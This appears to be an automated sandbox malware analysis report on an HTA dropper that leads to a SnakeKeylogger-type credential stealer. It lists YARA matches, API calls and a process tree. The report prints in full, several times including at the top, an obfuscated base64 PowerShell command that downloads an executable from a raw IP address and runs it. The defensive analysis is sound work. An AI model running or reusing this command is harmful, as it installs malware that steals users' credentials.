iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Malicious sample detected (through community Yara rule)
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: This is a third-party compiled AutoIt script.6_2_00103B3A
                    Source: cosse.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: cosse.exe, 00000006.00000002.968223248.00000000001B4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1fafc1a5-1
                    Source: cosse.exe, 00000006.00000002.968223248.00000000001B4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e957ecfb-c
                    Source: cssos[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2fe427ce-b
                    Source: cssos[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b0f6882f-e
                    Source: cosse.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c19b90ef-b
                    Source: cosse.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_a1ed56ff-5
                    Powershell drops PE file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cosse.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00163D61: CreateFileW,DeviceIoControl,CloseHandle,6_2_00163D61
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00158310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00158310
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_001651BD
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0010E6A06_2_0010E6A0
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0012D9756_2_0012D975
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0010FCE06_2_0010FCE0
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001221C56_2_001221C5
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001362D26_2_001362D2
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0013242E6_2_0013242E
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001225FA6_2_001225FA
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0015E6166_2_0015E616
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001166E16_2_001166E1
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0013878F6_2_0013878F
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001188086_2_00118808
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001808576_2_00180857
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001368446_2_00136844
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001688896_2_00168889
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0012CB216_2_0012CB21
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00136DB66_2_00136DB6
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00116F9E6_2_00116F9E
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001130306_2_00113030
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001231876_2_00123187
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0012F1D96_2_0012F1D9
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001012876_2_00101287
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001214846_2_00121484
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001155206_2_00115520
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001276966_2_00127696
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001157606_2_00115760
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001219786_2_00121978
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00139AB56_2_00139AB5
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00121D906_2_00121D90
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0012BDA66_2_0012BDA6
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00187DDB6_2_00187DDB
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0010DF006_2_0010DF00
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00113FE06_2_00113FE0
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00B839106_2_00B83910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EC1687_2_008EC168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E27B97_2_008E27B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008ECA587_2_008ECA58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E2DD17_2_008E2DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E7E687_2_008E7E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E4F087_2_008E4F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EB9E07_2_008EB9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008ECAAF7_2_008ECAAF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E4EF87_2_008E4EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E7E677_2_008E7E67
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: String function: 00107DE1 appears 36 times
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: String function: 00128900 appears 36 times
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: String function: 00120AE3 appears 70 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.cosse.exe.33b0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: cosse.exe PID: 920, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 6960, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@15/19@2/4
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016A06A GetLastError,FormatMessageW,6_2_0016A06A
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001581CB AdjustTokenPrivileges,CloseHandle,6_2_001581CB
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_001587E1
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_0016B333
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0017EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_0017EE0D
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016C397 CoInitialize,CoCreateInstance,CoUninitialize,6_2_0016C397
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00104E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,6_2_00104E89
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1792:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1okib0t.1gl.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000007.00000002.2095996663.00000000034DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.00000000025AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.0000000002590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: wecreatebestthingsentirelifeforgivenyou.htaVirustotal: Detection: 37%
                    Source: wecreatebestthingsentirelifeforgivenyou.htaReversingLabs: Detection: 23%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\wecreatebestthingsentirelifeforgivenyou.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E10.tmp" "c:\Users\user\AppData\Local\Temp\qrkmxxq1\CSCA5EBD89D883B423C8D6CB33CF6463C44.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cosse.exe "C:\Users\user\AppData\Roaming\cosse.exe"
                    Source: C:\Users\user\AppData\Roaming\cosse.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\cosse.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
